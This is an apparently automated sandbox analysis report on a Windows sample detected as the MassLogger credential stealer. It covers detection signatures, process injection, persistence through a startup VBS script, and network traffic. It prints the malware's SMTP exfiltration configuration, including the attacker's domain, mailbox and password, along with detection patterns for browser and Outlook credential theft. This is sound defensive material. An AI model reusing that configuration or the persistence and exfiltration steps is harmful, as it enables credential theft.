Edit tour

Windows Analysis Report
50201668.exe

Overview

General Information

Sample name:	50201668.exe
Analysis ID:	1590720
MD5:	651c185eccb37d286f19767a716bb68e
SHA1:	f2a06f853e287c09d4941b0e4a3c57518e54c7c7
SHA256:	9a5b6656c68d4210bf134fd61d70d402d89e419ef6d09e871728bf9b3d6dc4a0
Infos:

Detection

MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Drops script at startup location

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected Telegram RAT

AI detected suspicious sample

Drops VBS files to the startup folder

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

50201668.exe (PID: 6920 cmdline: "C:\Users\user\Desktop\50201668.exe" MD5: 651C185ECCB37D286F19767A716BB68E)

InstallUtil.exe (PID: 7584 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

wscript.exe (PID: 7772 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

Ticks.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Roaming\Ticks.exe" MD5: 651C185ECCB37D286F19767A716BB68E)

InstallUtil.exe (PID: 7988 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "sendxmaffle@jertcot.shop", "Password": "VVNrTTiP", "Server": "jertcot.shop", "To": "maffle@jertcot.shop", "Port": 587}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.2517076848.0000000000414000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.1412323204.0000000003297000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x74be7:$a1: get_encryptedPassword 0x8b807:$a1: get_encryptedPassword 0x74f0f:$a2: get_encryptedUsername 0x8bb2f:$a2: get_encryptedUsername 0x74982:$a3: get_timePasswordChanged 0x8b5a2:$a3: get_timePasswordChanged 0x74aa3:$a4: get_passwordField 0x8b6c3:$a4: get_passwordField 0x74bfd:$a5: set_encryptedPassword 0x8b81d:$a5: set_encryptedPassword 0x76559:$a7: get_logins 0x8d179:$a7: get_logins 0x7620a:$a8: GetOutlookPasswords 0x8ce2a:$a8: GetOutlookPasswords 0x75ffc:$a9: StartKeylogger 0x8cc1c:$a9: StartKeylogger 0x764a9:$a10: KeyLoggerEventArgs 0x8d0c9:$a10: KeyLoggerEventArgs 0x76059:$a11: KeyLoggerEventArgsEventHandler 0x8cc79:$a11: KeyLoggerEventArgsEventHandler
0000000D.00000002.2520170939.0000000003396000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.2520170939.0000000003396000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.1424420311.0000000006E70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf34f:$a1: get_encryptedPassword 0x25f6f:$a1: get_encryptedPassword 0xf677:$a2: get_encryptedUsername 0x26297:$a2: get_encryptedUsername 0xf0ea:$a3: get_timePasswordChanged 0x25d0a:$a3: get_timePasswordChanged 0xf20b:$a4: get_passwordField 0x25e2b:$a4: get_passwordField 0xf365:$a5: set_encryptedPassword 0x25f85:$a5: set_encryptedPassword 0x10cc1:$a7: get_logins 0x278e1:$a7: get_logins 0x10972:$a8: GetOutlookPasswords 0x27592:$a8: GetOutlookPasswords 0x10764:$a9: StartKeylogger 0x27384:$a9: StartKeylogger 0x10c11:$a10: KeyLoggerEventArgs 0x27831:$a10: KeyLoggerEventArgs 0x107c1:$a11: KeyLoggerEventArgsEventHandler 0x273e1:$a11: KeyLoggerEventArgsEventHandler
00000009.00000002.2520728746.00000000033DB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2520728746.00000000033DB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.1690167181.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: 50201668.exe PID: 6920	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: 50201668.exe PID: 6920	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: 50201668.exe PID: 6920	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 50201668.exe PID: 6920	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 50201668.exe PID: 6920	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: 50201668.exe PID: 6920	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x85f8b:$a1: get_encryptedPassword 0x8618f:$a2: get_encryptedUsername 0x85d4d:$a3: get_timePasswordChanged 0x85e62:$a4: get_passwordField 0x85fa1:$a5: set_encryptedPassword 0x87065:$a7: get_logins 0x86dda:$a8: GetOutlookPasswords 0x86c33:$a9: StartKeylogger 0x86fc8:$a10: KeyLoggerEventArgs 0x86c90:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: InstallUtil.exe PID: 7584	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 7584	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Ticks.exe PID: 7824	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Ticks.exe PID: 7824	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: Ticks.exe PID: 7824	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Ticks.exe PID: 7824	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Ticks.exe PID: 7824	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Ticks.exe PID: 7824	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x49468:$a1: get_encryptedPassword 0x49781:$a2: get_encryptedUsername 0x49217:$a3: get_timePasswordChanged 0x49338:$a4: get_passwordField 0x4947e:$a5: set_encryptedPassword 0x4ad81:$a7: get_logins 0x4aa32:$a8: GetOutlookPasswords 0x4a824:$a9: StartKeylogger 0x4acd1:$a10: KeyLoggerEventArgs 0x4a881:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: InstallUtil.exe PID: 7988	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 7988	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 27 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.50201668.exe.6e70000.8.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
12.2.Ticks.exe.42a01d0.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
12.2.Ticks.exe.42a01d0.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.Ticks.exe.42a01d0.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.Ticks.exe.42a01d0.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd37f:$a1: get_encryptedPassword 0xd6a7:$a2: get_encryptedUsername 0xd11a:$a3: get_timePasswordChanged 0xd23b:$a4: get_passwordField 0xd395:$a5: set_encryptedPassword 0xecf1:$a7: get_logins 0xe9a2:$a8: GetOutlookPasswords 0xe794:$a9: StartKeylogger 0xec41:$a10: KeyLoggerEventArgs 0xe7f1:$a11: KeyLoggerEventArgsEventHandler
12.2.Ticks.exe.42a01d0.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12323:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11821:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b2f:$a4: \Orbitum\User Data\Default\Login Data 0x12927:$a5: \Kometa\User Data\Default\Login Data
6.2.50201668.exe.6e70000.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
9.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.InstallUtil.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14123:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13621:$a3: \Google\Chrome\User Data\Default\Login Data 0x1392f:$a4: \Orbitum\User Data\Default\Login Data 0x14727:$a5: \Kometa\User Data\Default\Login Data
6.2.50201668.exe.4326a68.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
6.2.50201668.exe.4326a68.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.50201668.exe.4326a68.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.50201668.exe.4326a68.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd37f:$a1: get_encryptedPassword 0xd6a7:$a2: get_encryptedUsername 0xd11a:$a3: get_timePasswordChanged 0xd23b:$a4: get_passwordField 0xd395:$a5: set_encryptedPassword 0xecf1:$a7: get_logins 0xe9a2:$a8: GetOutlookPasswords 0xe794:$a9: StartKeylogger 0xec41:$a10: KeyLoggerEventArgs 0xe7f1:$a11: KeyLoggerEventArgsEventHandler
6.2.50201668.exe.4326a68.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12323:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11821:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b2f:$a4: \Orbitum\User Data\Default\Login Data 0x12927:$a5: \Kometa\User Data\Default\Login Data
6.2.50201668.exe.4326a68.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
6.2.50201668.exe.4326a68.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.50201668.exe.4326a68.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.50201668.exe.4326a68.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf17f:$a1: get_encryptedPassword 0x25d9f:$a1: get_encryptedPassword 0xf4a7:$a2: get_encryptedUsername 0x260c7:$a2: get_encryptedUsername 0xef1a:$a3: get_timePasswordChanged 0x25b3a:$a3: get_timePasswordChanged 0xf03b:$a4: get_passwordField 0x25c5b:$a4: get_passwordField 0xf195:$a5: set_encryptedPassword 0x25db5:$a5: set_encryptedPassword 0x10af1:$a7: get_logins 0x27711:$a7: get_logins 0x107a2:$a8: GetOutlookPasswords 0x273c2:$a8: GetOutlookPasswords 0x10594:$a9: StartKeylogger 0x271b4:$a9: StartKeylogger 0x10a41:$a10: KeyLoggerEventArgs 0x27661:$a10: KeyLoggerEventArgs 0x105f1:$a11: KeyLoggerEventArgsEventHandler 0x27211:$a11: KeyLoggerEventArgsEventHandler
6.2.50201668.exe.4326a68.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14123:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2ad43:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13621:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a241:$a3: \Google\Chrome\User Data\Default\Login Data 0x1392f:$a4: \Orbitum\User Data\Default\Login Data 0x2a54f:$a4: \Orbitum\User Data\Default\Login Data 0x14727:$a5: \Kometa\User Data\Default\Login Data 0x2b347:$a5: \Kometa\User Data\Default\Login Data
12.2.Ticks.exe.42a01d0.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
12.2.Ticks.exe.42a01d0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.Ticks.exe.42a01d0.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.Ticks.exe.42a01d0.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf17f:$a1: get_encryptedPassword 0x25d9f:$a1: get_encryptedPassword 0xf4a7:$a2: get_encryptedUsername 0x260c7:$a2: get_encryptedUsername 0xef1a:$a3: get_timePasswordChanged 0x25b3a:$a3: get_timePasswordChanged 0xf03b:$a4: get_passwordField 0x25c5b:$a4: get_passwordField 0xf195:$a5: set_encryptedPassword 0x25db5:$a5: set_encryptedPassword 0x10af1:$a7: get_logins 0x27711:$a7: get_logins 0x107a2:$a8: GetOutlookPasswords 0x273c2:$a8: GetOutlookPasswords 0x10594:$a9: StartKeylogger 0x271b4:$a9: StartKeylogger 0x10a41:$a10: KeyLoggerEventArgs 0x27661:$a10: KeyLoggerEventArgs 0x105f1:$a11: KeyLoggerEventArgsEventHandler 0x27211:$a11: KeyLoggerEventArgsEventHandler
12.2.Ticks.exe.42a01d0.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14123:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2ad43:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13621:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a241:$a3: \Google\Chrome\User Data\Default\Login Data 0x1392f:$a4: \Orbitum\User Data\Default\Login Data 0x2a54f:$a4: \Orbitum\User Data\Default\Login Data 0x14727:$a5: \Kometa\User Data\Default\Login Data 0x2b347:$a5: \Kometa\User Data\Default\Login Data
6.2.50201668.exe.42c19b0.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
6.2.50201668.exe.42c19b0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.50201668.exe.42c19b0.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.50201668.exe.42c19b0.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x74237:$a1: get_encryptedPassword 0x8ae57:$a1: get_encryptedPassword 0x7455f:$a2: get_encryptedUsername 0x8b17f:$a2: get_encryptedUsername 0x73fd2:$a3: get_timePasswordChanged 0x8abf2:$a3: get_timePasswordChanged 0x740f3:$a4: get_passwordField 0x8ad13:$a4: get_passwordField 0x7424d:$a5: set_encryptedPassword 0x8ae6d:$a5: set_encryptedPassword 0x75ba9:$a7: get_logins 0x8c7c9:$a7: get_logins 0x7585a:$a8: GetOutlookPasswords 0x8c47a:$a8: GetOutlookPasswords 0x7564c:$a9: StartKeylogger 0x8c26c:$a9: StartKeylogger 0x75af9:$a10: KeyLoggerEventArgs 0x8c719:$a10: KeyLoggerEventArgs 0x756a9:$a11: KeyLoggerEventArgsEventHandler 0x8c2c9:$a11: KeyLoggerEventArgsEventHandler
6.2.50201668.exe.42c19b0.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x791db:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x8fdfb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x786d9:$a3: \Google\Chrome\User Data\Default\Login Data 0x8f2f9:$a3: \Google\Chrome\User Data\Default\Login Data 0x789e7:$a4: \Orbitum\User Data\Default\Login Data 0x8f607:$a4: \Orbitum\User Data\Default\Login Data 0x797df:$a5: \Kometa\User Data\Default\Login Data 0x903ff:$a5: \Kometa\User Data\Default\Login Data
6.2.50201668.exe.43101d0.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
6.2.50201668.exe.43101d0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.50201668.exe.43101d0.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.50201668.exe.43101d0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x25a17:$a1: get_encryptedPassword 0x3c637:$a1: get_encryptedPassword 0x25d3f:$a2: get_encryptedUsername 0x3c95f:$a2: get_encryptedUsername 0x257b2:$a3: get_timePasswordChanged 0x3c3d2:$a3: get_timePasswordChanged 0x258d3:$a4: get_passwordField 0x3c4f3:$a4: get_passwordField 0x25a2d:$a5: set_encryptedPassword 0x3c64d:$a5: set_encryptedPassword 0x27389:$a7: get_logins 0x3dfa9:$a7: get_logins 0x2703a:$a8: GetOutlookPasswords 0x3dc5a:$a8: GetOutlookPasswords 0x26e2c:$a9: StartKeylogger 0x3da4c:$a9: StartKeylogger 0x272d9:$a10: KeyLoggerEventArgs 0x3def9:$a10: KeyLoggerEventArgs 0x26e89:$a11: KeyLoggerEventArgsEventHandler 0x3daa9:$a11: KeyLoggerEventArgsEventHandler
6.2.50201668.exe.43101d0.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2a9bb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x415db:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x29eb9:$a3: \Google\Chrome\User Data\Default\Login Data 0x40ad9:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a1c7:$a4: \Orbitum\User Data\Default\Login Data 0x40de7:$a4: \Orbitum\User Data\Default\Login Data 0x2afbf:$a5: \Kometa\User Data\Default\Login Data 0x41bdf:$a5: \Kometa\User Data\Default\Login Data
Click to see the 29 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs" , ProcessId: 7772, ProcessName: wscript.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 7584, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49780

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs" , ProcessId: 7772, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\50201668.exe, ProcessId: 6920, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T14:23:09.900906+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49736	193.122.130.0	80	TCP
2025-01-14T14:23:16.557167+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49736	193.122.130.0	80	TCP
2025-01-14T14:23:37.322867+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49888	193.122.130.0	80	TCP
2025-01-14T14:23:44.197923+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49888	193.122.130.0	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://jertcot.shop

Avira URL Cloud: Label: malware

Found malware configuration

Source: 6.2.50201668.exe.4326a68.2.raw.unpack

Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "sendxmaffle@jertcot.shop", "Password": "VVNrTTiP", "Server": "jertcot.shop", "To": "maffle@jertcot.shop", "Port": 587}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Ticks.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 50201668.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: 50201668.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49741 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49893 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.7:49789 version: TLS 1.2

Source: 50201668.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 50201668.exe, 00000006.00000002.1425364910.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, 50201668.exe, 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, 50201668.exe, 00000006.00000002.1421354221.0000000004249000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 50201668.exe, 00000006.00000002.1425364910.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, 50201668.exe, 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, 50201668.exe, 00000006.00000002.1421354221.0000000004249000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 50201668.exe, 00000006.00000002.1425059266.0000000006F60000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 50201668.exe, 00000006.00000002.1425059266.0000000006F60000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\50201668.exe	Code function: 4x nop then jmp 06DF1925h	6_2_06DF1580
Source: C:\Users\user\Desktop\50201668.exe	Code function: 4x nop then jmp 06DF1925h	6_2_06DF1565
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 015C9741h	9_2_015C9490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 015C9E6Ah	9_2_015C9A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 015C9E6Ah	9_2_015C9A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 015C9E6Ah	9_2_015C9D97
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 4x nop then jmp 06C91925h	12_2_06C91580
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 4x nop then jmp 06C91925h	12_2_06C9154F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 030C9731h	13_2_030C9480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 030C9E5Ah	13_2_030C9A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 030C9E5Ah	13_2_030C9A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 030C9E5Ah	13_2_030C9D87

Source: global traffic

TCP traffic: 192.168.2.7:49780 -> 162.254.34.31:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 194.15.112.248 194.15.112.248
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View

ASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49736 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49888 -> 193.122.130.0:80

Source: global traffic

TCP traffic: 192.168.2.7:49780 -> 162.254.34.31:587

